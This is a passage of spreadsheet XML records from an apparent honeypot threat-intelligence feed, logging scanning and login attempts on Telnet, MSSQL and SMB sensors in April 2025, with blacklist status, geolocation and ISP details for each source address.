    <d v="2025-04-07T16:58:53"/>
    <d v="2025-04-08T08:13:27"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:5500"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2635"/>
    <x v="2635"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T08:12:22"/>
    <d v="2024-04-10T09:28:00"/>
    <d v="2025-04-08T08:12:22"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H16"/>
    <s v="23731&amp;&amp;1433&amp;&amp;53"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="True"/>
    <s v="http"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Jakarta"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20941"/>
    <s v="106.821"/>
    <s v="17451"/>
    <s v="BIZNET NETWORKS"/>
    <s v="BIZNET"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-05-10"/>
    <s v="BIZNET-AP"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b6fd:7242"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2636"/>
    <x v="2636"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T08:03:50"/>
    <d v="2024-12-15T13:41:42"/>
    <d v="2025-04-08T08:03:50"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d01:84ca"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2637"/>
    <x v="2637"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T07:59:18"/>
    <d v="2025-04-08T07:59:18"/>
    <d v="2025-04-08T07:59:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3183:f7b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2638"/>
    <x v="2638"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T07:57:10"/>
    <d v="2024-12-08T15:01:11"/>
    <d v="2025-04-08T07:57:10"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SMB_H18"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Gautam Buddha Nagar"/>
    <s v="Noida (Block A)"/>
    <s v="7279746"/>
    <s v="201309"/>
    <s v="28.6253"/>
    <s v="77.3734"/>
    <s v="134319"/>
    <s v="Elyzium Technologies Pvt. Ltd."/>
    <s v="Elyzium Digital PVT LTD"/>
    <s v="business"/>
    <s v="Elyzium Digital PVT LTD"/>
    <s v="2021-12-20"/>
    <s v="ELYDIGI"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,64380)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,64938)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,62332)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,62848)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,63638)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,64333)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,61210)}&amp;&amp;{Data_SMB:Incoming connection (103.178.76.147,61843)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67b2:4c93"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2639"/>
    <x v="2639"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T07:30:21"/>
    <d v="2025-04-08T07:22:27"/>
    <d v="2025-04-08T07:30:21"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta Pusat"/>
    <s v="6754874"/>
    <s v="NA"/>
    <s v="-6.18104"/>
    <s v="106.826"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2011-01-14"/>
    <s v="TLKM_BB_SERVICE_36_82_DIVRE5-6"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2452:fb87"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2640"/>
    <x v="2640"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T07:29:34"/>
    <d v="2025-03-01T18:34:09"/>
    <d v="2025-04-08T07:29:34"/>
    <n v="143"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Shevchenkivskyi Raion"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4758"/>
    <s v="30.4052"/>
    <s v="48683"/>
    <s v="Bilink LLC"/>
    <s v="Bilink LLC"/>
    <s v="business"/>
    <s v="Bilink"/>
    <s v="2009-11-04"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d56f:46f1"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2641"/>
    <x v="2641"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T07:08:38"/>
    <d v="2024-11-25T10:49:35"/>
    <d v="2025-04-08T07:08:38"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H33"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="SB"/>
    <s v="West Sumatra"/>
    <s v="Kota Padang"/>
    <s v="Lubukbergalung"/>
    <s v="1637193"/>
    <s v="NA"/>
    <s v="-0.91534"/>
    <s v="100.458"/>
    <s v="133335"/>
    <s v="Politeknik Negeri Padang"/>
    <s v="Politeknik Negeri Padang"/>
    <s v="business"/>
    <s v="Politeknik Negeri Padang"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67fc:bd5a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2642"/>
    <x v="2642"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T06:51:04"/>
    <d v="2025-04-08T06:51:04"/>
    <d v="2025-04-08T06:51:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:1bc4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2643"/>
    <x v="2643"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T06:34:46"/>
    <d v="2025-04-08T06:34:46"/>
    <d v="2025-04-08T06:34:46"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:35a1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2644"/>
    <x v="2644"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T06:29:50"/>
    <d v="2025-04-08T06:29:50"/>
    <d v="2025-04-08T06:29:50"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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0:2511"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2645"/>
    <x v="2645"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T06:02:29"/>
    <d v="2025-02-14T06:21:15"/>
    <d v="2025-04-08T06:02:29"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="51208&amp;&amp;57112&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="SC"/>
    <s v="Seychelles"/>
    <s v="16"/>
    <s v="La Rivière Anglaise"/>
    <s v="NA"/>
    <s v="Victoria"/>
    <s v="241131"/>
    <s v="NA"/>
    <s v="-4.62113"/>
    <s v="55.4522"/>
    <s v="401120"/>
    <s v="cheapy.host LLC"/>
    <s v="cheapy.host LLC"/>
    <s v="hosting"/>
    <s v="Internet Secuirty Cheapyhost"/>
    <s v="2017-02-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4fb:5489"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2646"/>
    <x v="2646"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T06:01:12"/>
    <d v="2025-02-18T08:09:02"/>
    <d v="2025-04-08T06:01:12"/>
    <n v="54"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:c0"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2647"/>
    <x v="2647"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T06:01:03"/>
    <d v="2024-06-02T03:12:00"/>
    <d v="2025-04-08T06:01:03"/>
    <n v="87"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;24749&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:c9c9"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2648"/>
    <x v="2648"/>
    <s v="NA&amp;&amp;mail.kuntrucking.com"/>
    <x v="0"/>
    <d v="2025-04-08T05:59:10"/>
    <d v="2025-03-14T18:21:37"/>
    <d v="2025-04-08T05:59:10"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Barakhamba)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6287"/>
    <s v="77.2257"/>
    <s v="56272"/>
    <s v="Pulse Telesystems Pvt Ltd"/>
    <s v="Pulse Telesystems Pvt Ltd"/>
    <s v="business"/>
    <s v="Pulse Telesystems Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2012-04-24 09:42:46"/>
    <s v="2025-04-24 09:42:46"/>
    <s v="2024-04-22 12:35:34"/>
    <s v="['MSLABS.EARTH.ORDERBOX-DNS.COM', 'MSLABS.MARS.ORDERBOX-DNS.COM', 'MSLABS.MERCURY.ORDERBOX-DNS.COM', 'MSLABS.VENUS.ORDERBOX-DNS.COM']"/>
    <s v="PDR Ltd. d/b/a PublicDomainRegistry.com"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="32"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:67f9:50a6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2649"/>
    <x v="2649"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T05:57:12"/>
    <d v="2025-04-08T05:57:12"/>
    <d v="2025-04-08T05:57:12"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:512e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2650"/>
    <x v="2650"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T05:30:19"/>
    <d v="2025-03-13T12:34:28"/>
    <d v="2025-04-08T05:30:19"/>
    <n v="54"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="YO"/>
    <s v="Yogyakarta"/>
    <s v="Kota Yogyakarta"/>
    <s v="Yogyakarta"/>
    <s v="1621177"/>
    <s v="NA"/>
    <s v="-7.81091"/>
    <s v="110.349"/>
    <s v="55666"/>
    <s v="PT Media Sarana Data"/>
    <s v="GMEDIA"/>
    <s v="business"/>
    <s v="NA"/>
